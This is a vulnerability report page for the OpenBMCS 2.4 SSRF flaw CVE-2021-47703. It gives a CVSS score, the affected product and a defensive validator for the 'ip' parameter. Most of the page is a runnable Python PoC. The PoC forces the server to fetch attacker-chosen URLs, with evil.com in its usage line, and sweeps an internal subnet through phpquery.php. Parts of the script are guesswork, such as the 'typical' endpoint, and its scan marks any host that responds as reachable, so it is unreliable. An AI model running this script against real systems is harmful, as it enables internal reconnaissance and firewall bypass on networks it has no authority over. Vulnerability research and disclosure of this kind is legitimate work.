Security Vulnerability Report
CVE-2021-47703 CVSS 7.2 HIGH

Published: 2025-12-09 21:15:49
Last Modified: 2025-12-19 19:39:03

Description

OpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the 'ip' parameter to force the application to make an HTTP request to an arbitrary destination host.
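A server-side check on the 'ip' parameter that addresses the weakness described above, shown as an added example (not OpenBMCS code and not taken from any advisory): the value must be a literal IP address inside an operator-defined allowlist, so hostnames, URLs and loopback or link-local targets are refused. The names `validate_ip_param` and `ALLOWED_NETWORKS` are hypothetical and the network value is constructed.

```python
import ipaddress

# Assumption: the only network this deployment is meant to query (constructed value).
ALLOWED_NETWORKS = [ipaddress.ip_network("10.20.0.0/24")]


def validate_ip_param(raw, allowed=ALLOWED_NETWORKS):
    """Return the canonical address if `raw` is an allowed literal IP, else None."""
    if not isinstance(raw, str) or len(raw) > 45:
        return None
    try:
        # ip_address() accepts literal addresses only: hostnames, URLs,
        # "host:port" pairs and CIDR suffixes all raise ValueError.
        addr = ipaddress.ip_address(raw)
    except ValueError:
        return None
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so it cannot dodge the IPv4 checks.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    # Refuse the server itself, link-local (cloud metadata) and other special ranges.
    if (addr.is_loopback or addr.is_link_local or addr.is_multicast
            or addr.is_unspecified or addr.is_reserved):
        return None
    # Default deny: the address must fall inside an explicitly allowed network.
    if not any(addr.version == net.version and addr in net for net in allowed):
        return None
    return str(addr)
```

The outbound request should be made to the returned string, not to the raw parameter, so that nothing is re-parsed or resolved after the check.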

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openbmcs:openbmcs:2.4:*:*:*:*:*:*:* - VULNERABLE
OpenBMCS 2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2021-47703 OpenBMCS SSRF PoC
# Target: OpenBMCS 2.4 (phpquery.php)
# Author: Security Researcher
# Note: For authorized security testing only


def exploit_ssrf(target_url, attacker_domain):
    """
    Exploit SSRF vulnerability in OpenBMCS 2.4

    Args:
        target_url: Base URL of vulnerable OpenBMCS server
        attacker_domain: Domain controlled by attacker for callback

    Returns:
        bool: True if exploit successful, False otherwise
    """
    # Construct malicious URL with SSRF payload
    ssrf_payload = f"http://{attacker_domain}/"

    # Target endpoint (typical OpenBMCS phpquery.php)
    endpoint = f"{target_url}/phpquery.php"

    # Parameters that trigger SSRF
    params = {
        "ip": ssrf_payload,
        "action": "ping"  # or other action that triggers HTTP request
    }

    try:
        print(f"[*] Sending SSRF payload to {endpoint}")
        print(f"[*] Target will make request to: {ssrf_payload}")

        # Send request without authentication
        response = requests.get(endpoint, params=params, timeout=10)

        print(f"[+] Request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


def internal_network_scan(target_url, internal_ip_range):
    """
    Use SSRF to scan internal network

    Args:
        target_url: Base URL of vulnerable server
        internal_ip_range: IP range to scan (e.g., "192.168.1.")
    """
    endpoint = f"{target_url}/phpquery.php"

    print(f"[*] Scanning internal network via SSRF...")

    for i in range(1, 255):
        target_ip = f"{internal_ip_range}{i}"
        params = {
            "ip": f"http://{target_ip}:80/",
            "action": "ping"
        }
        try:
            response = requests.get(endpoint, params=params, timeout=2)
            print(f"[+] Host {target_ip} is reachable")
        except requests.exceptions.RequestException:
            # Request errors and timeouts are skipped silently
            pass


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2021-47703.py <target_url> <attacker_domain>")
        print("Example: python cve-2021-47703.py http://vulnerable-server.com evil.com")
        sys.exit(1)

    target = sys.argv[1]
    attacker = sys.argv[2]

    exploit_ssrf(target, attacker)
```
